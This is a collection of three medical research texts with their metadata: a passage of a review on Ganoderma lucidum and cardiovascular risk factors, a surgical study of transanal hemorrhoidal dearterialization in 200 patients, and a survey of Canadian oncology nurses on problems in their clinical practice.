The most recent guidelines for the management of hypertension recommend initiating antihypertensive drug therapy in most patients with a combination of two different drugs from the classes of thiazide diuretics, calcium channel blockers, angiotensin converting enzyme (ACE) inhibitors, or angiotensin receptor blocker (ARBs) (Whelton et al. 2018;Williams et al. 2018).
Triterpenes and G. lucidum proteins have been demonstrated to possess potent ACE-inhibitory properties in vitro (Abdullah et al. 2012;Mohamad Ansor et al. 2013). Mohamad Ansor et al. (2013) reported that the protein fractions from the mycelia of G. lucidum contain highly potent anti-ACE proteins with IC 50 values below 200 lg/mL. Furthermore, three small peptides with ACE-inhibitory activity, including Gln-Leu-Val-Pro (QLVP), Gln-Asp-Val-Leu (QDVL), and Gln-Leu-Asp-Leu (QLDL), were recently isolated from G. lucidum mycelia (Wu et al. 2019). Notably, QLVP worked in a mixed-type manner against ACE and has an IC 50 value of 127.9 mmol/L.
A transverse aortic constriction (TAC) mouse model of pressure overload-induced cardiomyopathy and heart failure revealed that administration of oral Ganoderma spore oil every other day for 14 days normalised ejection fraction, corrected the fractional shortening and reduced left ventricular hypertrophy. The cardioprotective effect is associated with reduced expression of circular RNA circ-Foxo3, which plays a role in the pathogenesis of heart failure (Xie et al. 2016).
An early uncontrolled trial in Japanese showed that supplementation with G. lucidum extract (240 mg daily) for 6 months reduced blood pressure in hypertensive patients but not borderline hypertensive or normotensive patients (Kanmatsuse et al. 1985). In a double-blind, randomised, placebo-controlled study in 160 patients with confirmed coronary heart disease (CHD), treatment with G. lucidum polysaccharides (Ganopoly TM ) for 12 weeks improved the symptoms of CHD and reduced average blood pressure from 142.5/96.4 mmHg to 135.1/92.8 mmHg, whereas there was no significant blood pressure reduction in the control group (Gao et al. 2004a). Serum TC also decreased significantly with Ganopoly TM therapy, but not in the control group.
Anti-inflammatory effects
Inflammation is a physiological response to harmful stimuli that are physical, chemical, or biological in nature. A number of inflammatory markers, such as high-sensitivity C-reactive protein (hsCRP), interleukin (IL)-6, IL-1, and tumour necrosis factor (TNF)-a, have been shown to be associated with obesity, metabolic syndrome, and an elevated risk of chronic diseases (Pravenec et al. 2011;Dallmeier et al. 2012). Elevated circulating levels of hsCRP and IL-6 predict the development of T2DM through diminishing insulin sensitivity (Guarner & Rubio-Ruiz 2015). Obesity-induced inflammation has been implicated as a risk factor in the pathogenesis of T2DM, insulin resistance, CVD, and metabolic syndrome (Kumar et al. 2019).
There are several in vitro studies showing the anti-inflammatory effect of G. lucidum extracts. The triterpene extract from G. lucidum reduced the secretion of TNF-a and IL-6, and inflammatory mediator nitric oxide (NO) and prostaglandin E(2) (PGE2) from lipopolysaccharide (LPS)-activated murine macrophages via inhibition of nuclear factor-jB (NF-jB) and activator protein 1 (AP-1) signalling (Dudhgaonkar et al. 2009). G. lucidum sterols downregulated the mRNA expressions of NO, TNFa, IL-1b, and IL-6, and attenuated LPS-induced cell polarisation by modulating mitogen-activated protein kinase (MAPK) and NF-jB pathways (Xu et al. 2021). Furthermore, G. lucidum ethanol extract reduced the excessive production of NO, PGE2, and pro-inflammatory cytokines, IL-1b, and TNF-a via inhibition of the NF-jB and toll-like receptor signalling pathways in LPSstimulated BV2 microglial cells (Yoon et al. 2013).
In an in vivo study, administration of water extract of G. lucidum (2 g/kg, s.c.) 1 h prior to applying carrageenan reduced both the first and second phases of carrageenan-induced inflammation (Lin et al. 1993). It has been demonstrated that both ethyl acetate and 70% methanol extracts of G. lucidum (500 and 1000 mg/kg) produced anti-inflammatory effects against carrageenan-induced acute and formalin-induced chronic inflammation in mice and the effect was comparable to that of the standard reference drug, diclofenac (10 mg/kg) (Sheena et al. 2003).
The anti-inflammatory effect of G. lucidum supplementation has been investigated in several small scale trials. In a clinical trial involving 45 ST-elevation myocardial infarction (STEMI) and non-STEMI patients, the polysaccharides of G. lucidum (750 mg/day in 3 divided doses for 90 days) decreased the levels of IL-1 and TNF-a, as well as the MDA levels (Sargowo et al. 2019). In a recent randomised closed-label clinical trial involving 38 patients with atrial fibrillation, consumption of polysaccharides of G. lucidum (PT Sahabat Lingkungan Hidup, Surabaya, Indonesia), 3 times a day for 90 days, reduced significantly the systolic and diastolic blood pressure, heart rate, LDL-C, IL-1b, IL-6, hsCRP, and TNF-a, compared to placebo-treated patients (Rizal et al. 2020). These data suggest that G. lucidum polysaccharide peptides may have beneficial effects against factors involved in the pathogenesis of atherosclerosis and atrial fibrillation. The main active compounds which have been shown to influence some of the major risk factors for CVD are shown in Figure 4.
Adverse effects
G. lucidum is generally regarded as safe and is listed in the safest drug class (Class 1 Drug) in the American Herbal Products Association Botanical Safety Handbook with no known herb-drug interactions (McGuffin et al. 1997). Recent human clinical trials with G. lucidum have included laboratory safety parameters such as hepatic, renal, and hematological biomarkers and no pathological abnormality or serious adverse event has been reported (Klupp et al. 2015(Klupp et al. , 2016. Mild symptomatic adverse effects such as dry mouth, sore throat, and nausea have been reported occasionally. A case of hepatotoxicity related to G. lucidum mushroom powder was reported from Hong Kong in 2004, but this was thought to be due to the excipient ingredients (Yuen et al. 2004). Another case of fatal fulminant hepatitis in a patient taking Lingzhi in powder form was reported from Thailand in 2007 (Wanmuang et al. 2007). Such cases do need careful assessment before attributing the effects to G. lucidum components, but they also illustrate the need to be vigilant with herbal treatments.
It is important to be cautious when taking herbal supplements in combination with conventional medications, particularly those that are very sensitive to herb or drug interactions such as warfarin. Most herbal supplements are contraindicated in patients taking warfarin. G. lucidum may have a mild antithrombotic effect itself in high doses and this could increase the effect of other anticoagulant or antiplatelet medications, including aspirin (Kumaran et al. 2011), resulting in an increased risk of bruising or bleeding. In patients taking other prescription medications, it is generally better to separate the intake of those medications and G. lucidum products by at least two hours in case there is any interference with drug absorption.
Conclusions
G. lucidum has a reputation for many beneficial effects from a historical perspective and its safety has largely been established by empirical observation. The beneficial effects are supported by several in vitro studies and studies in animals, but clinical trials in humans in the cardiovascular field are limited. Secondly, the use of different products in the clinical trials makes it difficult to Triterpenoids Ganoderic acid Df -aldose reductase inhibitor Ganoderol B -alpha-glucosidase inhibitor Proteoglycans/peptidoglycans Fudan-Yueyang Ganoderma lucidum (FYGL) -inhibitor of protein tyrosine phosphatase 1B Ganoderan B -increases insulin Polysaccharides G. lucidum polysaccharides (Gl-PS)increase insulin by protection of pancreatic beta-cells F31 -alters glucose regulatory enzymes Proteins Ling Zhi-8 -immunosuppressive to prevent autoimmune pancreatic damage
Ganoderma lucidum
Polysaccharides G. lucidum polysaccharides (Gl-PS)decrease IL-1β, IL-6, hsCRP, and TNF-α compare the results. In the prevention and treatment of CVD, the hypoglycaemic effects of G. lucidum are the best established properties from the in vitro and animal studies, but these benefits have not been confirmed in recent clinical trials. Components from G. lucidum herbal materials have been identified with lipid-lowering and antihypertensive effects and compounds with specific mechanisms of action have been isolated. Nevertheless, the content of these components and their bioavailability in different G. lucidum formulations are uncertain and clinical trials in these areas have been inadequate. Further studies are needed to isolate all the active ingredients with known biological activity, and to characterise their bioavailability for specific indications before clinical trials pertaining to the use of G. lucidum products for relevant clinical benefits are conducted. Clinical trials should be performed in subjects with abnormal baseline levels of cardiovascular risk factors that are being targeted so that improvements can be seen more readily. | 2021-09-02T06:23:41.165Z | 2021-01-01T00:00:00.000 | {
"year": 2021,
"sha1": "bc1d9165c0bcdc459905cdf160d827cb5e86ece1",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1080/13880209.2021.1969413",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "ec4594dfea3f456785059ab21e16f0a1fb0a9340",
"s2fieldsofstudy": [
"Medicine",
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
219531883 | pes2o/s2orc | v3-fos-license | Transanal hemorrhoidal dearterialization: Lessons learned from a personal series of 200 consecutive cases and a proposal for a tailor-made procedure
Background Transanal hemorrhoidal dearterialization (THD) is an effective treatment for hemorrhoidal disease (HD). However, the surgical technique is not standardized and the results for advanced HD are controversial. The aim of this study was to assess surgical outcomes after a long follow-up and compare total and partial mucopexy. Materials and methods Between March 2011 and July 2014, THD was offered to patients with symptomatic prolapsed hemorrhoids (Grades II, III and IV). Dearterialization was performed with the guidance of Ultrasound Doppler and mucopexy for prolapsed piles, and regarded as total or partial (if less than 6 mucopexies). Post-operative complications, long-term results and patients’ satisfaction rates were analyzed. Results 200 consecutive patients were recruited with a mean follow-up of 43 months (range 29 - 57 months). HD distribution was GII (N = 35, 17.5%), GIII (N = 124, 62%), and GIV (N = 41, 20.5%). Postoperative complications included transient tenesmus (26,5%), pain (14%) and fecal impaction (2,5%). Recurrence rates were 0, 2,4% and 17,1% for prolapse (p < 0,01) and 2,9%, 4% and 9,8% for bleeding (p = 0,33) in grades II, III and IV, respectively. Total mucopexy resulted in more tenesmus (31,2%) than partial mucopexy (14,5%), (p < 0,01). After 12 weeks of follow-up, 85% of patients were either very satisfied or satisfied; 8,5% were dissatisfied. Conclusion THD-mucopexy is safe with low overall recurrence. Grade IV HD is associated with more recurrence and postoperative complications. Total mucopexy is associated with more tenesmus, pain and fecal impaction. A tailor-made procedure with selective dearterialization and mucopexy may be the next step in this evolving technique.
Introduction
Hemorrhoidal disease (HD) remains one of the most common afflictions seen by surgeons and gastroenterologists worldwide. Knowledge of its existence as well as its treatments dates from time immemorial and several studies have already been published about its history, epidemiology, and treatment modalities, yet no consensus has been reached about its precise incidence, prevalence, and standard of care to date.
Treatment of HD is not straightforward because of the several different presentations and the frequent association with other anorectal ailments, such as: skin tags, thrombosis, fistulas, anal fissures, etc. Hemorrhoids may be internal, external, or both; single or multiple; have different sizes and forms. Therefore, a definitive conclusion about the ideal therapy for hemorrhoids is close to utopian.
Surgical treatment by pile excision has been regarded as the most effective way to eradicate symptoms and to avoid recurrence. Inasmuch as "radical" pile-resection became the gold-standard therapy for decades, its tempestuous post-operative course, their short-term and longterm sequelae, and a better understanding of hemorrhoid pathophysiology, have propelled colorectal surgeons to attempt other forms of treatment. Thus anoderm-preserving methods of the distal rectum and anal canal, such as dearterialization and mucosal pexy (or lifting) described in the past two decades have gained wide acceptance. Stapled mucosal resection and anopexy, also known as procedure for prolapse and hemorrhoids (PPH), and hemorrhoidal artery ligation (HAL) also known as transanal hemorrhoidal dearterialization (THD) comprise the most important advances in this direction [1][2][3]. THD, may be dopplerhttps://doi.org/10.1016/j.amsu.2020.05.036 Received 22 May 2020; Accepted 26 May 2020 guided or not, and done with or without mucopexy [4,5].
In this study, we report our personal experience with one of such techniques, THD and mucopexy (THD-M), with a prolonged follow-up. We compare our experience and acquired learning of its pitfalls with other reported series, and we entertain ways to customize this evolving technique into a tailor-made procedure.
Materials and methods
Between March 2011 and July 2014, patients with symptomatic prolapsed hemorrhoids were recruited for THD-M at University of São Paulo's teaching hospital, Hospital das Clínicas, and from our private practice at Hospital Nove de Julho, São Paulo, Brazil. Grading was established according to Goligher's classification [6]. Data were collected prospectively and results were analyzed at the end of the follow-up. The aim of this study was to assess for early and late results after a long follow-up and to compare total and partial mucopexy.
Eligible patients were grade II HD refractory to conservative management (fiber-enriched diet, laxatives, and life-style changes, or ambulatory rubber band ligation), as well as grades III and IV. External hemorrhoids and skin tags were meticulously assessed. All patients were thoroughly interviewed with emphasis on evacuatory and hemorrhoidal symptoms, and subjected to complete proctologic examination including anoscopy.
All patients 50 years of age or greater underwent colonoscopy. Exclusion criteria included coagulation disorders, pregnancy, inflammatory bowel disease, previous anorectal surgery, rectal procidentia, anal incontinence, immunosuppression and anorectal cancer. Patients with external hemorrhoids and skin tags were also included. Patients were thoroughly instructed as to their diagnosis, therapeutic options, the proposed procedure and its potential complications, before the operation was carried out. All patients signed an informed consent out of free will before the operation. The hospital's ethics committee approved the informed consent form and the operative protocol. This manuscript has been reported in line with the STROCSS criteria [7].
THD-M was offered as first choice treatment for 262 consecutive patients who fitted the eligibility criteria. Medical provider restrictions or patient preferences reduced the final THD-M group to 200 patients (55 were eventually operated by stapled-hemorrhoidopexy, and 7 by conventional hemorrhoidectomy).
The degree of satisfaction with the procedure was assessed 12 weeks after the surgery, and classified into four levels: very satisfied, somewhat satisfied, indifferent or dissatisfied. Any referred complication was also written in the follow-up chart.
Statistical analysis was performed with the objective of making comparisons between the degrees of hemorrhoidal disease, type of mucopexy and surgical outcomes. To make these comparisons, Fisher's exact test and chi-square tests were used, with a significance level of 5% for two-tailed tests. The analyses were performed using IBM-SPSS software for Windows, version 20.0.
Operative technique
All THD-M procedures were performed under laryngeal mask airway control anesthesia. Intestinal cleansing or enemas were not done prior to the operation. The operative procedure was performed as previously described in detail by Ratto et al. [8].
Patients were positioned in the lithotomy position. Prophylactic antibiotic (ciprofloxacin i.v.) was administered for all patients. A THD Doppler Kit device was used (THD Slide® S.p.A., Correggio., Italy). Following lidocaine gel lubrication, the proctoscope was inserted through the anal canal reaching the lower rectum, about 4-5 cm from the anal verge. Six arterial trunks were almost always identified at 1, 3, 5, 7, 9, and 11 o'clock. The rectal mucosa and submucosa were then transfixed with an "X" suture (2-0 absorbable polyglycolic acid with a 5/8-inch needle) to ligate the artery. The depth of the transfixed stitches was easily and safely calibrated by using the pivot hole provided in the center of the proctoscope lumen. Each mucosal distal point (caudad) from these trunks was marked with electrocautery just above the pectinate line (10 mm above). Mucopexy was performed with the original proctoscope making multiple passages of a continuous suture through the mucosa and submucosa until the anorectal ring was reached at the point previously marked with the electrocautery (above the pectinate line). One firm cranial knot elevated and fixed the mucosal prolapse (mucosal lifting) thus completing the mucopexy. During the procedure, the anal canal mucosa was always spared from the suture. Mucopexy was only performed in patients with prolapsed hemorrhoids and it was regarded as partial (when a running suture was fewer than six) and as total when six sutures were performed. The type of mucopexy performed was chosen at the discretion of the surgeon at the time of the surgery.
Patients were discharged within 24 h, mostly after the first bowel movement and maintained on a liquid-rich and fiber enriched diet, as well as with emolients. Patients were advised to avoid intense physical exercise and fecal straining for at least 2-3 weeks post-operatively. If no passage of stools occurred within 48 h, patients were advised to use osmotic laxatives (lactulose or polyethylene glycol 3350) and, the unsuccessful cases were returned for medical re-evaluation. Analgesia control was done with ketoprofene 100 mg twice a day, dipirone 1 g every 6 h, or paracetamol 750 mg three times a day, for 5-7 days. Upon discharge patients were re-evaluated at 1, 3, and 12 weeks, as well as 6 and 12 months post-operatively, or by demand. They were examined and questioned about anal bleeding, prolapse, pain, fecal incontinence, and bowel habits.
Early postoperative results
Early postoperative results where assessed during hospital stay, at the first and third postoperative week following the surgery. Mean operative time was 27 min (range: 23-50 min). All patients had a total of 6 dearterializations done 4-5 cm above the anal verge. Total mucopexy was done in 138 patients (69%), and partial mucopexy in 62 patients (31%). Associated procedures were necessary in 37 patients (18.5%): skin tag excision in 29 (14.5%), hypertrophic papilla excision in 3, resection of anal canal polyp in 3, and resection of a sebaceous cyst in 2. Hospital stay was 1 day for 191 patients (95.5%), 2 days for 6 patients (3%), and 3 days for 3 patients (1.5%). Time to full return to normal daily activity was 4-7 days (mean 5.2 days) for 187 patients (93.5%), and > 7 days for 13 patients. Intraoperative complications were 1 (0.5%) rectal hematoma and 1 (0.5%) rectal bleeding, which were successfully treated by transfixing hemostatic 2-0 polyglactin sutures. There was no perioperative mortality, nor there was any 30-day mortality.
Postoperative (PO) complications included transient tenesmus in 53 patients (26.5%) in the first 7 PO days, and opioid-requiring pain in 28 (14%) patients. Early PO active bleeding requiring surgical intervention occurred in 3 patients (1 caused by mucosal ulceration, and 2 from loosening of one of the dearterialization running sutures). Both were successfully resolved by hemostatic suturing. Urinary retention in need of bladder catheterization occurred in 4 (2%) patients (patients were all male and older than 50 years). Fecal impaction occurred in 5 (2.5%) patients who were then treated by osmotic laxatives and/or enema administration. External hemorrhoidal thrombosis occurred in 7 (3.5%) patients, and only 2 of them required surgical intervention. Anal fissures in the PO period were observed in 2 patients who were successfully treated conservatively (0.5% isosorbide dinitrate ointment and laxatives) for 8 weeks.
Long term results
Mean follow-up time was 43 months (range 29 -57 months). All patients were clinically re-evaluated at 12 months PO, and all were interviewed by phone at 3 months prior to the writing of this paper. At late follow-up, 10 (5%) patients presented prolapse recurrence (3 were previously classified as Grade III and 7 grade IV hemorrhoids). Seven were treated by rubber band ligation, 2 by Ferguson's hemorrhoidectomy, and 1 by re-THD-M (Fig. 1). Small recurrent anal bleeding after 1 week of PO was observed in 10 patients, all of them successfully managed by phlebotonics and suppositories. At 12 weeks PO, no patient reported bleeding. Residual skin tags were observed in 14 (7%) of patients, and excision was done in 3 patients as per patient request (pruritus and hygiene difficulty). After 12 weeks of follow-up, 67% (134/200 patients) were very satisfied, 18% (36/200) somewhat satisfied, 6,5% (13/200) indifferent and 8,5% (17/200) dissatisfied. Chronic anorectal pain or fecal incontinence were not reported at any PO time until the writing of this paper. (See Table 1)
Discussion
THD-M is a minimally invasive technique for the treatment of HD with lower rates of postoperative pain and shorter recovery when compared with conventional hemorrhoidectomy. However, there are aspects of the surgical technique that may influence outcomes and still need to be addressed, such as: the number of dearterializations, if Doppler guidance is required and if total or partial mucopexy achieve different results.
Our present study with 200 patients submitted to Doppler-guided THD, aimed to compare early and late results in regard to control of prolapse and bleeding, and also to assess if the type of mucopexy (total or partial) influences outcomes. Our mean follow-up was 43 months, which is longer than most of the series and may allow the diagnosis of late recurrences.
The operating time ranged from 23 to 50 min and the return to regular activities occurred in average at 5,2 days. Resolution of bleeding and prolapse was achieved in 95% of the patients. At the end of 12 weeks, 85% were satisfied or very satisfied, 6,5% indifferent and 8,5% were dissatisfied. Similar results have been published [9].
Surgical complications were mostly of low complexity and there was not any perioperative mortality. Reoperation due to bleeding was required in 2 patients (1%) and successfully controlled with hemostatic suturing. Postoperative pain, defined as those who required opioids for pain control, was present in 14% of our patients. Interestingly, pain was more severe in grade IV HD (39,1%), compared with grades III (8,06%) and II (5,7%) (p < 0,01). Rubini and Tartari also reported more pain in grade IV HD and those submitted to more than four mucopexies [10]. This is probably due to local edema and transitory ischemia caused by the suture lines at the distal rectum, often referred by patients as "burning pain sensation".
Fecal impaction is rarely reported in the literature following THD-M procedure, possibly because it is not considered a complication. All the 5 patients who had fecal impaction had grade IV HD and were submitted to total mucopexy. Up to 7% of postoperative constipation has been reported [11]. Hemorrhoidal thrombosis was diagnosed in 7 patients (3,5%). Five patients were managed clinically but other two were treated with thrombectomy. Two patients (1%) developed anal fissure and were treated with fibers, laxatives and 0.5% isosorbide dinitrate with success. This complication is infrequent and has been reported in less than 1% of the cases [5,23]. Residual skin tag was noticed in 14 patients (7%) and surgical resection was necessary in 4 due to pruritus and difficulty with hygiene. This finding has been previously reported in 3,9 to 8,3% of patients following THD [4,12,13].
The most frequent complication was tenesmus. Patients who were submitted to total mucopexy were more likely to report this complication (31,2%) than those submitted to partial mucopexy (14,5%) (p < 0,05). Total mucopexy was not associated with better control of prolapse or bleeding (Table 3). It should be noticed that the type of mucopexy was chosen at the discretion of the surgeon at the time of the surgery and that the two groups were not randomized which could have led to bias -it is possible that more complex disease (more prolapsed piles) were preferentially treated with total mucopexy. However, our impression is that HD comprises a heterogeneous group of patientseven among the same Goligher's classification -, and randomizing them according to the type of mucopexy could not have completely solved the problem. Our data show that partial mucopexy achieves good results and total mucopexy is not necessary for all patients, especially for those with fewer prolapsed piles.
Ratto et al. in the largest series published to date, reported "pain/ tenesmus" in 3,1% of his patients [14]. However, their definition of "pain/tenesmus" was patients who required painkillers for more than 5 days, which was not the same definition we used in our study. It is often difficult to differentiate pain from tenesmus in the first few days PO, so we actively inquired patients about the urge to defecate and the sense of incomplete evacuation.
In regard to long-term outcomes, there was a much higher recurrence of the prolapse in grade IV HD (17,1%), when compared with grades II (0%) and III (2,4%) (p < 0,001) (Table 2). Similarly, more patients with advanced HD reported recurrence of bleeding, 9,5% of grade IV, 4,03% of grade III and 2,85% of grade II, although not statistically significant (p = 0,33). Interestingly, as noticed by other authors recurrence after THD procedure is usually just 1 or 2 piles, which allows treatment with less invasive procedures, such as rubber band ligation [9,14,15]. In our patients, rubber band ligation was performed in 7 patients, 2 were submitted to conventional hemorrhoidectomy and in 1 Re-THD-M, all with good outcomes.
In the literature, there a high variability in terms of recurrence for grade IV HD, ranging from 9% [16] to up to 50% [17]. Brazilian multicenter study with 705 patients published by our group, reported a general recurrence rate of 6,4% but 26,5% for grade IV HD [18]. Ratto et al. reported recurrence of prolapse and bleeding in 18,1% of patients with grade IV and 8,7% and 8,5% for grade III and grade II respectively [14]. Giordano et al. in an attempt to reduce the recurrence rate suggested that the desarterialization and the mucopexy should be performed using two different sutures and noticed recurrence in just 1 of 31 patients (3%) [19]. However, grade IV HD was defined as "those with constant prolapse, regardless if they were reducible or not", which is not accurate according to Goligher's classification and may have improved the results with the inclusion of grade III HD.
Anatomic studies of the anal canal have shown an important variability in terms of the number and position of the arteries that form the hemorrhoidal plexus at the distal rectum and anal canal [20,21]. Studies of the THD technique without the guidance of Doppler probe have achieved comparable outcomes [22][23][24]. This calls into question if the real benefit of THD technique arises from the ligation of a specific artery. Most likely, changes in the microcirculation and improved venous return due to the correction of the prolapse may play a role.
Other authors have assessed the arterial blood flow of hemorrhoids with Doppler guidance after the PPH technique (Procedure for Prolapse and Hemorrhoids), which removes a strip of mucosa, submucosa and not infrequently the muscular wall of the distal rectum, but have demonstrated no changes in blood flow [25,26].
In line with the presented data, we have made adjustments to our surgical technique and currently have an ongoing study to analyze the results. Instead of performing the dearterialization in the usual 6 points of the anal canal or guided by ultrasound Doppler, we selectively perform the dearterialization and the mucopexy only above the prolapsed piles. Our impression is that minimizing the sutures achieves similar outcomes in terms of recurrence but possibly less early post-operative morbidity, such as pain, tenesmus and fecal impaction.
Conclusions
In conclusion, this study confirms that THD-M is safe, achieves good long-term outcomes and high patient-reported satisfaction rates. Overall recurrence is low, but specifically in Grade IV HD, more recurrence of the prolapse is expected and patients should be informed in advance. Total mucopexy is associated with more postoperative tenesmus, pain and fecal impaction and it is not necessary for all patients. A tailor-made procedure with selective dearterialization and mucopexy just above symptomatic piles may be the next step in this evolving technique.
Ethical approval
Ethical approval was given for this study.
Sources of funding
There was no funding for this research.
Author contribution
Carlos 3. Hyperlink to your specific registration (must be publicly accessible and will be checked).
Guarantor
Carlos Walter Sobrado accepts full responsibility for the data and decision to publish.
Consent
Written informed consent was obtained from the patient for publication of this case report and accompanying images. A copy of the written consent is available for review by the Editor-in-Chief of this journal on request.
Provenance and peer review
Not commissioned, externally reviewed.
Declaration of competing interest
There are no relevant conflicts of interest or disclosures. | 2020-06-04T09:12:37.670Z | 2020-05-29T00:00:00.000 | {
"year": 2020,
"sha1": "43da66d060a75942508998ebf1119e2c1cf98839",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1016/j.amsu.2020.05.036",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "730fefce0d6d813e1a390633b2a32e46b70e6a87",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
38638843 | pes2o/s2orc | v3-fos-license | Important issues in clinical practice : Perspectives of oncology nurses
As the 1990s draw to a close, the cancer care environment is undergoing rapid change. Many issues exist within the complex environment of cancer care that could create a challenge in providing quality nursing care to patients. This study examined the current challenges oncology nurses face in their daily practice. Surveys were mailed to members of the Canadian Association of Nurses in Oncology asking them to indicate on a list of 80 issues which were problems in their daily practice. From the responses of 249 oncology nurses, the following items were ranked as the top 10 problems: anxiety, coping/stress management, bereavement/death, fatigue, metastatic disease, comfort, pain control and management, quality of life, recurrence of primary cancer, and nurse burn-out. Principal component analysis was conducted to determine if patterns existed in the way problems had been rated. Five components explained 42% of the variance in the data set: comprehensive cancer care, communication, experience of loss, terminal illness, and signs and symptoms. Implications for nursing practice, education and research are highlighted.
Introduction
As the 1990s draw to a close, providing nursing care for individuals with cancer and their families remains a challenge across Canada.Many issues exist within the complex environment of cancer care that contribute to the challenge of providing quality oncology nursing care.
The demand for cancer care is on the rise because of an increasing incidence of cancer and the aging trend in the Canadian population.In 1998, 129,200 Canadians were expected to be diagnosed with cancer (NCIC, 1997).In the past decade, the number of new cases increased by close to 30,000, up almost one-third from the 100,000 cases diagnosed in 1988.This type of increase is expected to continue into the next decade.The increasing demand for cancer services will mean higher costs to maintain current levels of service.In addition, many of the new treatments currently under investigation and soon to be available are costly agents to administer (D. Cowan, personal communication, October 1998).
Concerns about the future and costs for health care have mobilized significant activity in health care reform.The subsequent restructuring and downsizing has had an impact in various ways.Care that once was delivered in hospitals is now being delivered in ambulatory settings or in the patient's home.Shortened hospital stays and a high frequency of same-day procedures mean individuals are going home with many needs for care.High patient-to-nurse ratios influence inpatient nurses' ability to provide patient education for self-care and to establish effective community links for patients following discharge.Frequently patients report that care is fragmented and coordination poor (Ontario Ministry of Health, 1992-3).
Advances in knowledge and technology have led to increasingly complex treatment protocols.It is not unusual for patients to receive chemotherapy and radiation therapy concurrently.Managing symptoms and counteracting side effects are ever-present issues for both nurses and patients.
The nature of cancer and its treatment also contributes to the complexity of delivering care.The diagnosis of cancer has an impact that is not only physical but also emotional, psychological and spiritual.For many individuals, cancer is equated with a "death sentence".Coping with cancer means an individual must handle a multitude of feelings and practical concerns.Patients frequently express frustration concerning how difficult it is to achieve timely access to relevant, understandable information that would help them cope (Ontario Ministry of Health, 1992-3).Patients also report lack of access to supportive care services or programs (McLeod, 1994).
Another trend which has added challenge to the delivery of cancer care is the rising survivor advocacy movement.Survivors are advocates for change in the cancer care system.They are calling for increased access to information and increased participation by patients in decision-making about their care.Frequently, these types of requests are perceived by busy oncology staff as demands that increase the length of clinic appointments and interfere with clinic efficiency.Additionally, many patients are actively pursuing complementary and alternative therapies in an attempt to exert some control over their situation and enhance their well-being (Gray et al., 1997).However, many alternative therapies are not supported with empirical evidence and oncology nurses may experience a sense of conflict in discussing them with patients.
Oncology nurses cannot help but be influenced by the changing cancer care environment.Challenges emerge for nurses as they strive to provide quality care within the constraints and pressures of the working environment.Dealing with these new practice challenges has implications for education, research and policy development.
The purpose of this investigation was to identify the current challenges oncology nurses face in their daily practice.Once identified, the challenges can provide a basis for future investigation and program development.In particular, challenges which occur most frequently could pinpoint priorities for action by researchers, administrators, educators and professional nursing associations.
152
CONJ: 9/4/99 RCSIO: 9/4/99 Therefore, this study examined the perspectives of nurses who work in oncology care settings about the clinical and professional issues that are recognized as problems in their daily practice.
Methods
Data about important clinical issues were gathered from nurses working in oncology care settings.Eight hundred and ten questionnaires were mailed using the 1995 Canadian Association of Nurses in Oncology (CANO) membership listing.Respondents were requested to complete and return the questionnaire anonymously within four weeks.A reminder letter was sent after four weeks as a means of increasing the response rate.
A demographic data form and a survey questionnaire were developed by the investigators.The survey questionnaire included an alphabetical listing of 80 topic items.The items were derived from topics included in previous Oncology Nursing Society research priority surveys (Funkhouser & Grant, 1989;Mooney, Ferrell, Nail, Benedict & Haberman, 1991;Stetz, Haberman, Holcombe & Jones, 1995) as well as from newly emerging issues identified in the oncology nursing literature.Topics covered a wide range of areas including biophysiological (e.g., pain control and management, stomatitis, nutrition) and psychosocial (e.g., patient disclosure, communication) patient issues that spanned the cancer care spectrum.In addition, professional issues such as models of nursing care and oncology nurse job satisfaction were included in the list.An "other" category also was included to allow respondents to write in items that they perceived were missing.
For each topic item, respondents were instructed to answer two questions.The first question asked them to indicate the extent to which the item posed a problem in their daily practice.A problem was defined "as an issue or situation needing a solution or better information".Respondents rated an item as a problem according to the following scale: not at all, sometimes, often, always, or do not know.The second question asked respondents to indicate the extent to which the item should be given nursing research attention according to the following scale: none, some, or a lot.
Questions pertaining to nurses' perceptions about research priorities were also included in the questionnaire.Data collected from the research priorities questions are presented elsewhere (Bakker & Fitch, 1998).
Sample characteristics
Of the 810 surveys mailed to CANO members, 249 were returned for a response rate of 31%.Table One shows the demographic characteristics of the nurse respondents.The majority (61%) of respondents were between 35 and 49 years of age.Over 40% had been employed for 16 to 25 years in nursing and most (60%) had been employed in oncology from six to 15 years.In terms of their clinical practice, the respondents predominantly worked with adult cancer patients in hospital or ambulatory care settings.Seventy-three per cent reported that more than 75% of their practice involved caring for cancer patients.Of the 16.5% of nurses with post-graduate university degrees, the majority were at the Masters level.
Topics identified as important clinical problems
To determine important clinical problems as perceived by oncology nurses, rank order listings of the 80 topic items were developed.First, a total score was calculated for each item based on how respondents rated the item as a "problem" in their clinical practice.Points were assigned as follows: three points for "always a problem"; two points for "often a problem"; one point for "sometimes a problem"; and zero points for "not a problem" or "do not know".The item's rank order was determined by total points accumulated.
The top 10 clinical problems for the overall study sample (n=249) are shown in Table Two.Beside each item is its total score and the number of times (frequency) it was rated as "always a problem".The top ranked clinical problem was anxiety.This topic was rated as "always a problem" by 27% (66/249) of the sample.In accumulative points, the total score for "anxiety" ranked 47 points above the second ranked topic.The point difference between the total scores of the second place item and tenth place item was 56 points (score range 456-400).The other items included in the top 10 clinical problems included psychosocial issues of coping/stress management, bereavement/death, comfort and quality of life and biophysiological issues related either to symptom management (e.g., fatigue) or disease stage (metastatic disease).The only professional issue that surfaced in the top 10 list was nurse burn-out which received a ranking of 10.
For purposes of further analyzing perceptions of clinical problems, rank orders of important clinical problems were determined for subgroups of the oncology nurse sample.Table Three shows the rank order of clinical problems according to the age of respondents.Age was selected as a variable because of the potential influence life experience could have on one's perception of what constitutes an issue or problem.In each column, the top 10 items are listed.Beside each item is its total score and the number of times (frequency) it was rated as "always a problem".In all three age groups, "anxiety" was ranked as the most important clinical problem.With respect to differences in the lists, the younger age group was the only group to include a communication issue (specifically communication between patient/physician) as a top ranked clinical problem.Rankings determined from responses of the more mature group of nurses showed that this group ranked topics such as metastatic disease and recurrence of primary cancer higher as clinical problems than did their younger nurse colleagues.
